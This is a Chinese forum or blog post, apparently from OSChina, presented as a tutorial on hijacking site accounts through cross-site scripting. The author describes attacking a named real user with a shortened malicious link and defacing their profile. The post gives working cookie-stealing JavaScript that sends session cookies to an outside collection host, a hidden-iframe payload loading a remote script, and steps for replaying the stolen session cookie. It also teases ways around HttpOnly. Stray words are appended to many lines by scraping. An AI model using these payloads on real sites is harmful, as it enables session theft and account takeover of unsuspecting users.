《蟋蟀的xss淫蕩教程之如何劫持OSC用戶帳號》

首先,先道歉..讓@鉑金小豬 成爲了受害用戶...當了我兒子一天...如今@Soga @皮總 大家知道那天是怎麼回事了吧。。javascript

其實今天要講的是Xss(Cross Site Scripting)的一種利用方式:劫持用戶帳號html

首先須要找到OSChina存在xss注入的地方。:)這裏先隱藏。。等@紅薯 修復。。。前端

而後再將帶有XSS的url(我使用了google的短連接包裝了一下)發給受害者@鉑金小豬java

 

而後讓oschina充滿養豬廣告的妹紙@鉑金小豬 哭了:web

不信的話,你們如今還能夠去看@鉑金小豬 空間左側的簽名chrome

 

其實xss你們搜搜下就知道怎麼利用了。。可是劫持帳戶上。你們可能以爲有兩個難點..我在這裏教你們。。cookie

1.若是收到被害者的cookie.網絡

其實能夠在本身網站上作一個腳原本進行cookie收集。。。也能夠用第三方的cookie收集平臺。。app

好比xsser.me或者xss.la等。這兩個平臺都是禁止註冊的。。本身寫一個就好.很簡單xss

 

熟悉javascript,簡單看下別人偷cookie的代碼。。就明白是怎麼回事了

var x=new Image();
try
{
var myopener='';
myopener=window.opener && window.opener.location ? window.opener.location : '';
}
catch(err)
{
}
x.src='http://xssapp.com/accept.aspx?id=@pid&location='+escape(document.location)+'&toplocation='+escape(top.document.location)+'&cookie='+escape(document.cookie)+'&opener='+escape(myopener);
self.location="http://my.oschina.net/samshuai";

上面是個人xss javascript代碼。。。

再發個別人的一個利用方式:

<iframe onload="this.src='xss 地址+<script src =tmxk.Org/0.js>'" style="display:none"></iframe>

2.得到cookie以後,如何使用?

其實firefox和chrome都有插件能夠完成這個功能。直接替換上@鉑金小豬 的oscid就能夠用他的帳號說話了。。

我用的是firefox的web developer toolbar:

 

@紅薯 兼職就是聰明絕頂啊。。。這兩天他搗鼓了一個Java EE 6.0 的 Cookie 類已經有設置 HttpOnly 的方法。。

其實使用httponly也是一種防止cookie被盜和被修改的方法。。主要讓document.cookie不起做用。這真的能防止cookie被盜麼???我笑了。。。。。你們能夠說下繼續利用的方式。。看看和個人繞過httponly方法是否一致。個人方法裏面包裹document.xxx你們想一想吧。。。

還有就是使用了httponly真的不能使用工具修改本身的cookie了麼??也是有極其淫蕩的方式的。。。你們也能夠說說。

擴展閱讀:

網絡攻擊技術(二)——Cross-site scripting

Java EE 6.0 的 Cookie 類已經有設置 HttpOnly 的方法

什麼是HttpOnly

利用最近熱門的Xss漏洞能作什麼?

如何解決繁瑣的WEB前端的XSS問題

對oschina的一次友情xss測試

相關文章
相關標籤/搜索